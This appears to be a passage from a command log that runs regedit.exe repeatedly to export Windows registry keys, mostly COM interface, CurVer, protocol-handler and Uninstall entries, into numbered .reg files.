/e "114.reg" "HKEY_CLASSES_ROOT\Interface\{BB13B3C3-AF9B-43DB-9DF8-B2F65AA5E21B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "115.reg" "HKEY_CLASSES_ROOT\Interface\{8D46C1B6-BBAB-450D-A61F-4DDC898B21D4}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "116.reg" "HKEY_CLASSES_ROOT\Interface\{5007373A-20D7-458F-9FFB-ABC900E3A831}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "117.reg" "HKEY_CLASSES_ROOT\Interface\{4FDC29A1-340B-45FB-90A3-2654D980BEFB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "118.reg" "HKEY_CLASSES_ROOT\Interface\{4CAC6328-B9B0-11D3-8D59-0050048384E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "119.reg" "HKEY_CLASSES_ROOT\Interface\{5007373A-20D7-458F-9FFB-ABC900E3A831}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "120.reg" "HKEY_CLASSES_ROOT\Interface\{507171A9-0D7B-47CA-8DF5-56B23ACDC623}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "121.reg" "HKEY_CLASSES_ROOT\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "122.reg" "HKEY_CLASSES_ROOT\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "123.reg" "HKEY_CLASSES_ROOT\Interface\{476E2969-3B2B-4B3F-8277-CFF6056042AA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "124.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "125.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "126.reg" "HKEY_CLASSES_ROOT\Interface\{4815E0C3-F66C-4236-BD38-FE3810B54076}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "127.reg" "HKEY_CLASSES_ROOT\Interface\{4A894040-247E-4AFF-BB08-3489E9905235}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "128.reg" "HKEY_CLASSES_ROOT\Interface\{4A894040-247E-4AFF-BB08-3489E9905235}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "129.reg" "HKEY_CLASSES_ROOT\Interface\{49E0DBD1-9440-466C-9C97-95C67190C603}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "130.reg" "HKEY_CLASSES_ROOT\Interface\{5A577640-501D-4927-BCD0-5EF57A7ED175}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "131.reg" "HKEY_CLASSES_ROOT\Interface\{5852F5EC-8BF4-11D4-A245-0080C6F74284}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "132.reg" "HKEY_CLASSES_ROOT\Interface\{55F88896-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "133.reg" "HKEY_CLASSES_ROOT\Interface\{5AF314CF-8849-4A79-A3FC-8DE6625D9E72}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "134.reg" "HKEY_CLASSES_ROOT\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "135.reg" "HKEY_CLASSES_ROOT\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "136.reg" "HKEY_CLASSES_ROOT\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "137.reg" "HKEY_CLASSES_ROOT\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "138.reg" "HKEY_CLASSES_ROOT\Interface\{52027082-0B74-4648-9564-828CC6CB656C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "139.reg" "HKEY_CLASSES_ROOT\Interface\{507171A9-0D7B-47CA-8DF5-56B23ACDC623}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "140.reg" "HKEY_CLASSES_ROOT\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "141.reg" "HKEY_CLASSES_ROOT\Interface\{55F88892-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "142.reg" "HKEY_CLASSES_ROOT\Interface\{55F88890-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "143.reg" "HKEY_CLASSES_ROOT\Interface\{54613049-40BF-4035-9E70-0A9312C0188D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "144.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "145.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF4-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "146.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF3-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "147.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF2-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "148.reg" "HKEY_CLASSES_ROOT\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "149.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D760-6018-11CF-9016-00AA0068841E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "150.reg" "HKEY_CLASSES_ROOT\Interface\{3B813CE7-7C10-4F84-AD06-9DF76D97A9AA}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "151.reg" "HKEY_CLASSES_ROOT\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "152.reg" "HKEY_CLASSES_ROOT\Interface\{36DE898D-AD48-40A5-B4B2-123F916BFBAB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "153.reg" "HKEY_CLASSES_ROOT\Interface\{36DE898D-AD48-40A5-B4B2-123F916BFBAB}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "154.reg" "HKEY_CLASSES_ROOT\Interface\{3580A828-07FE-4B94-AC1A-757D9D2D3056}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "155.reg" "HKEY_CLASSES_ROOT\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "156.reg" "HKEY_CLASSES_ROOT\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "157.reg" "HKEY_CLASSES_ROOT\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "158.reg" "HKEY_CLASSES_ROOT\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "159.reg" "HKEY_CLASSES_ROOT\Interface\{452AC71A-B655-4967-A208-A4CC39DD7949}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "160.reg" "HKEY_CLASSES_ROOT\Interface\{45046D60-08CA-11CF-A90F-00AA0062BB4C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "161.reg" "HKEY_CLASSES_ROOT\Interface\{45046D60-08CA-11CF-A90F-00AA0062BB4C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "162.reg" "HKEY_CLASSES_ROOT\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "163.reg" "HKEY_CLASSES_ROOT\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "164.reg" "HKEY_CLASSES_ROOT\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "165.reg" "HKEY_CLASSES_ROOT\Interface\{465E787A-0556-452F-9477-954E4A940003}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "166.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "167.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "168.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D760-6018-11CF-9016-00AA0068841E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "169.reg" "HKEY_CLASSES_ROOT\Interface\{4291224C-DEFE-485B-8E69-6CF8AA85CB76}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "170.reg" "HKEY_CLASSES_ROOT\Interface\{4495AD01-C993-11D1-A3E4-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "171.reg" "HKEY_CLASSES_ROOT\Interface\{4495AD01-C993-11D1-A3E4-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "172.reg" "HKEY_CLASSES_ROOT\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "173.reg" "HKEY_CLASSES_ROOT\Interface\{81F9B44F-BA3A-4F5D-9B51-090C74A9B3A4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "174.reg" "HKEY_CLASSES_ROOT\Interface\{81F9B44F-BA3A-4F5D-9B51-090C74A9B3A4}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "175.reg" "HKEY_CLASSES_ROOT\Interface\{7EDF9A92-4750-41A5-A17F-879A6F4F7DCB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "176.reg" "HKEY_CLASSES_ROOT\Interface\{8284B8A2-A8A8-11D1-A3D2-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "177.reg" "HKEY_CLASSES_ROOT\Interface\{83C49FF0-B294-11D0-9488-00A0C91110ED}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "178.reg" "HKEY_CLASSES_ROOT\Interface\{83C49FF0-B294-11D0-9488-00A0C91110ED}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "179.reg" "HKEY_CLASSES_ROOT\Interface\{8284B8A2-A8A8-11D1-A3D2-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "180.reg" "HKEY_CLASSES_ROOT\Interface\{7CD069A0-50AA-11D1-B8F0-00A0C9259304}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "181.reg" "HKEY_CLASSES_ROOT\Interface\{7C85BF5E-DC7C-4F61-839B-4107E1C9B68E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "182.reg" "HKEY_CLASSES_ROOT\Interface\{7AE2A4AD-F2F4-4BA7-98B1-67C96736CD5F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "183.reg" "HKEY_CLASSES_ROOT\Interface\{7CD069A0-50AA-11D1-B8F0-00A0C9259304}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "184.reg" "HKEY_CLASSES_ROOT\Interface\{7EA23D88-569E-4EFD-9851-A1528A7745F9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "185.reg" "HKEY_CLASSES_ROOT\Interface\{7EA23D88-569E-4EFD-9851-A1528A7745F9}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "186.reg" "HKEY_CLASSES_ROOT\Interface\{7D6B8796-D75D-4348-A445-6DDE811AF9AC}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "187.reg" "HKEY_CLASSES_ROOT\Interface\{8BF94B48-1E76-4AA3-AB1D-463F49B3E681}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "188.reg" "HKEY_CLASSES_ROOT\Interface\{8BF94B48-1E76-4AA3-AB1D-463F49B3E681}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "189.reg" "HKEY_CLASSES_ROOT\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "190.reg" "HKEY_CLASSES_ROOT\Interface\{8CD444E8-C9BB-49B3-8E38-E03209416131}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "191.reg" "HKEY_CLASSES_ROOT\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "192.reg" "HKEY_CLASSES_ROOT\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "193.reg" "HKEY_CLASSES_ROOT\Interface\{8D076AD6-9B6F-4150-A0FD-5D7E8C8CB02C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "194.reg" "HKEY_CLASSES_ROOT\Interface\{888A5A60-B283-11CF-8AD5-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "195.reg" "HKEY_CLASSES_ROOT\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "196.reg" "HKEY_CLASSES_ROOT\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "197.reg" "HKEY_CLASSES_ROOT\Interface\{888A5A60-B283-11CF-8AD5-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "198.reg" "HKEY_CLASSES_ROOT\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "199.reg" "HKEY_CLASSES_ROOT\Interface\{8A64A872-FC6B-4D4A-926E-3A3689562C1C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "200.reg" "HKEY_CLASSES_ROOT\Interface\{8A4A20C2-93F3-44E8-8644-BEB2E3487E84}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "201.reg" "HKEY_CLASSES_ROOT\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "202.reg" "HKEY_CLASSES_ROOT\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "203.reg" "HKEY_CLASSES_ROOT\Interface\{673E8454-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "204.reg" "HKEY_CLASSES_ROOT\Interface\{673E8454-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "205.reg" "HKEY_CLASSES_ROOT\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "206.reg" "HKEY_CLASSES_ROOT\Interface\{6D4B9C3E-CC05-493F-85E2-43D1006DF96A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "207.reg" "HKEY_CLASSES_ROOT\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "208.reg" "HKEY_CLASSES_ROOT\Interface\{68746729-F493-4830-A10F-69028774605D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "209.reg" "HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "210.reg" "HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "211.reg" "HKEY_CLASSES_ROOT\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "212.reg" "HKEY_CLASSES_ROOT\Interface\{627EA7B4-95B5-4980-84C1-9D20DA4460B1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "213.reg" "HKEY_CLASSES_ROOT\Interface\{673E8452-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "214.reg" "HKEY_CLASSES_ROOT\Interface\{673E8452-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "215.reg" "HKEY_CLASSES_ROOT\Interface\{66BB2F51-5844-4997-8D70-4B7CC221CF92}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "216.reg" "HKEY_CLASSES_ROOT\Interface\{74C26041-70D1-11D1-B75A-00A0C90564FE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "217.reg" "HKEY_CLASSES_ROOT\Interface\{737361EC-467F-11D1-810F-0000F87557AA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "218.reg" "HKEY_CLASSES_ROOT\Interface\{737361EC-467F-11D1-810F-0000F87557AA}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "219.reg" "HKEY_CLASSES_ROOT\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "220.reg" "HKEY_CLASSES_ROOT\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "221.reg" "HKEY_CLASSES_ROOT\Interface\{796A2C2D-5B11-4FB5-9077-56D5E674972B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "222.reg" "HKEY_CLASSES_ROOT\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "223.reg" "HKEY_CLASSES_ROOT\Interface\{6F81EA95-074E-48D4-AA96-62197E0AE96F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "224.reg" "HKEY_CLASSES_ROOT\Interface\{6F81EA95-074E-48D4-AA96-62197E0AE96F}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "225.reg" "HKEY_CLASSES_ROOT\Interface\{6EA00553-9439-4D5A-B1E6-DC15A54DA8B2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "226.reg" "HKEY_CLASSES_ROOT\Interface\{70B31271-BC47-4EB8-8074-67D06378D691}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "227.reg" "HKEY_CLASSES_ROOT\Interface\{72B82A24-A598-4E87-895F-CDB23A49E9DC}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "228.reg" "HKEY_CLASSES_ROOT\Interface\{724C1646-E64B-4BBF-8EB4-D45E4FD580DA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "229.reg" "HKEY_CLASSES_ROOT\Interface\{70B31271-BC47-4EB8-8074-67D06378D691}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "230.reg" "HKEY_CLASSES_ROOT\MSOLAP140ErrorLookup\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "231.reg" "HKEY_CLASSES_ROOT\MSOLAP130ErrorLookup\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "232.reg" "HKEY_CLASSES_ROOT\MSOLAP\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "233.reg" "HKEY_CLASSES_ROOT\MSOLAPUI140.ConnectDialog\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "234.reg" "HKEY_CLASSES_ROOT\MsoTDAddin.Connect\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "235.reg" "HKEY_CLASSES_ROOT\MsoPeopleDataHandler.PeopleDataProvider\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "236.reg" "HKEY_CLASSES_ROOT\MsoPeopleDataHandler.PeopleDataHandler\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "237.reg" "HKEY_CLASSES_ROOT\MSComctlLib.TabStrip\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "238.reg" "HKEY_CLASSES_ROOT\MSComctlLib.Slider\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "239.reg" "HKEY_CLASSES_ROOT\MSComctlLib.SBarCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "240.reg" "HKEY_CLASSES_ROOT\MSComctlLib.Toolbar\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "241.reg" "HKEY_CLASSES_ROOT\MsoEuro.Converter\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "242.reg" "HKEY_CLASSES_ROOT\MSDMine\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "243.reg" "HKEY_CLASSES_ROOT\MSComctlLib.TreeCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "244.reg" "HKEY_CLASSES_ROOT\Office.QueryConstraints\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "245.reg" "HKEY_CLASSES_ROOT\Office.Query\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "246.reg" "HKEY_CLASSES_ROOT\odc.tablecollection\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "247.reg" "HKEY_CLASSES_ROOT\Office.QueryConstraintsBuilder\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "248.reg" "HKEY_CLASSES_ROOT\Office.StorageServer\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "249.reg" "HKEY_CLASSES_ROOT\Office.Session\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "250.reg" "HKEY_CLASSES_ROOT\Office.Row\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "251.reg" "HKEY_CLASSES_ROOT\NotificationData"

C:\Windows\SysWOW64\regedit.exe

/e "252.reg" "HKEY_CLASSES_ROOT\mswindowsvideo"

C:\Windows\SysWOW64\regedit.exe

/e "253.reg" "HKEY_CLASSES_ROOT\mswindowsmusic"

C:\Windows\SysWOW64\regedit.exe

/e "254.reg" "HKEY_CLASSES_ROOT\odc.cube\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "255.reg" "HKEY_CLASSES_ROOT\odc.table\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "256.reg" "HKEY_CLASSES_ROOT\odc.new\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "257.reg" "HKEY_CLASSES_ROOT\odc.database\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "258.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ProgCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "259.reg" "HKEY_CLASSES_ROOT\LR.LexRefEnglishStemmer.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "260.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualTextContext.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "261.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualServiceAttribute.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "262.reg" "HKEY_CLASSES_ROOT\LR.LexRefServiceContainer.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "263.reg" "HKEY_CLASSES_ROOT\LR.LexRefStFrObject.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "264.reg" "HKEY_CLASSES_ROOT\LR.LexRefStEsObject.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "265.reg" "HKEY_CLASSES_ROOT\LR.LexRefServiceManager.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "266.reg" "HKEY_CLASSES_ROOT\ImeCommonAPIClassFactory1042\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "267.reg" "HKEY_CLASSES_ROOT\ImeCommonAPIClassFactory1028\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "268.reg" "HKEY_CLASSES_ROOT\ImeCommonAPI1042\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "269.reg" "HKEY_CLASSES_ROOT\ImeKeyEventHandler1042\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "270.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualService.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "271.reg" "HKEY_CLASSES_ROOT\imkrhjd.hanjadic\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "272.reg" "HKEY_CLASSES_ROOT\IMEPad.SKF.TCIME\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "273.reg" "HKEY_CLASSES_ROOT\MOFL.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "274.reg" "HKEY_CLASSES_ROOT\Microsoft.Workfolders\DefaultIcon"

C:\Windows\SysWOW64\regedit.exe

/e "275.reg" "HKEY_CLASSES_ROOT\Microsoft.TEC\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "276.reg" "HKEY_CLASSES_ROOT\ms-xbl-3d8b930f"

C:\Windows\SysWOW64\regedit.exe

/e "277.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ListViewCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "278.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ImageListCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "279.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ImageComboCtl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "280.reg" "HKEY_CLASSES_ROOT\mailto"

C:\Windows\SysWOW64\regedit.exe

/e "281.reg" "HKEY_CLASSES_ROOT\LR.LexRefXml2RTFObject.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "282.reg" "HKEY_CLASSES_ROOT\LR.LexRefTfFunctionProvider.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "283.reg" "HKEY_CLASSES_ROOT\microsoft-edge"

C:\Windows\SysWOW64\regedit.exe

/e "284.reg" "HKEY_CLASSES_ROOT\Microsoft.OsfMui.InstallerMainShell\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "285.reg" "HKEY_CLASSES_ROOT\Microsoft.MsoASB.RemoterTrusted\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "286.reg" "HKEY_CLASSES_ROOT\microsoft-edge-holographic"

C:\Windows\SysWOW64\regedit.exe

/e "287.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\SysWOW64\regedit.exe

/e "288.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\SysWOW64\regedit.exe

/e "289.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\SysWOW64\regedit.exe

/e "290.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\SysWOW64\regedit.exe

/e "291.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\SysWOW64\regedit.exe

/e "292.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\SysWOW64\regedit.exe

/e "293.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\SysWOW64\regedit.exe

/e "294.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\SysWOW64\regedit.exe

/e "295.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\SysWOW64\regedit.exe

